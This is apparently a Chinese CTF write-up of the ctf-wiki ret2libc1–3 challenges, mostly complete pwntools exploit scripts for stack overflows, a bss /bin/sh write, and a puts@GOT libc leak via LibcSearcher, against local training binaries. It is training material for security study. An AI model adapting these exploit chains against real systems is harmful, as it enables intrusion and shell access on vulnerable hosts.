pwn ret2libc系列

题目链接 ： https://github.com/ctf-wiki/ctf-challenges

ret2libc1

checksec一下只开了NX 和 部分RELRO

main函数

secure函数

有溢出给了plt表里也有system函数的address 也有/bin/sh字符串，payload已经可以构造出来了

offset = 0x64

  1 from pwn import *                                                                                                         
  2 
  3 io = process('./ret2libc1')
  4 
  5 elf = ELF('./ret2libc1')
  6 
  7 system_plt_addr = elf.plt['system']
  8 binsh_addr = next(elf.search(b"/bin/sh"))
  9 offset = 108
 10 
 11 print('system_plt_addr:',system_plt_addr)
 12 print('binsh_addr : ',binsh_addr)
 13 #payload = flat([b'a'*(offset+4),system_plt_addr,p32(0),binsh_addr])
 14 payload = b'a'*(offset+4) + p32(system_plt_addr) + p32(0) + p32(binsh_addr)
 15 io.sendline(payload)
 16 io.interactive()

ret2libc2

checksec一下

可以看到和上题基本一样，但是没了/bin/sh字符串

往bss段的buf2写入/bin/sh

exp

  1 from pwn import *                                                                                                         
  2 
  3 io = process('./ret2libc2')
  4 
  5 elf = ELF('./ret2libc2')
  6 
  7 system_plt_addr = elf.plt['system']
  8 gets_plt_addr = elf.plt['gets']
  9 pop_ebx_ret = 0x0804843d
 10 buf2_addr = 0x0804A080
 11 offset = 108
 12 
 13 pop_ebp_ret = 0x0804872f
 14 aaa = 0x0804872d
 15 
 16 
 17 
 18 print("system_plt_addr:",system_plt_addr)
 19 print("gets_plt_addr:",gets_plt_addr)
 20 payload = flat([b'a'*(offset+4),gets_plt_addr,pop_ebx_ret,buf2_addr,system_plt_addr,p32(0),buf2_addr])
 21 io.sendline(payload)
 22 io.sendline(b'/bin/sh\x00')
 23 io.interactive()

ret2libc3

checksec一下

main函数

secure函数

这个师傅讲得很详细

如果puts的返回函数用main的话会少8个字节，这是因为程序的真正入口是_start函数,并非main函数
_start函数and操作拉高8个字节的长度，如果选择_start函数作为返回函数那么溢出的字符仍然为108+4

我这里用了三个方法
泄露libc可以选择用__libc_start_main或者其他已经加载在got表中的函数
返回函数可以选择main函数（溢出长度104）或者_start函数（溢出长度108+4）
getshell的时候选择往buf2里写入shell或者用libc的/bin/sh字符串

exp

  1 from pwn import *                                                                                
  2 from LibcSearcher import LibcSearcher
  3 
  4 
  5 
  6 io = process('./ret2libc3')
  7 elf = ELF('./ret2libc3')
  8 puts_plt_addr = elf.plt['puts']
  9 __libc_start_main_addr = elf.got['__libc_start_main']
 10 puts_got_addr = elf.got['puts']
 11 main_addr = elf.symbols['main']
 12 _start_addr = elf.symbols['_start']
 13 offset = 108
 14 #payload = flat(['A'*112,puts_plt_addr,main_addr,__libc_start_main_addr])
 15 payload = flat(['A'*112,puts_plt_addr,_start_addr,puts_got_addr])
 16 io.sendlineafter("Can you find it !?",payload)
 17 got_puts_addr = u32(io.recv()[0:4])
 18 print got_puts_addr
 19 
 20 #libc = LibcSearcher('__libc_start_main',libc_start_main_addr)
 21 #libcbase = libc.dump('__libc_start_main') - libc_start_main_addr
 22 
 23 
 24 libc = LibcSearcher('puts',got_puts_addr)
 25 libcbase = got_puts_addr - libc.dump('puts')
 26 system_addr = libc.dump('system') + libcbase
 27 gets_addr = libc.dump('gets') + libcbase
 28 buf2_addr = 0x0804A080
 29 binsh_addr = libc.dump('str_bin_sh') + libcbase
 30 
 31 
 32 #payload = flat(['a'*104,gets_addr,system_addr,buf2_addr,buf2_addr])
 33 
 34 payload = flat(['a'*112,system_addr,p32(0),binsh_addr])
 35 
 36 
 37 io.sendline(payload)
 38 io.interactive()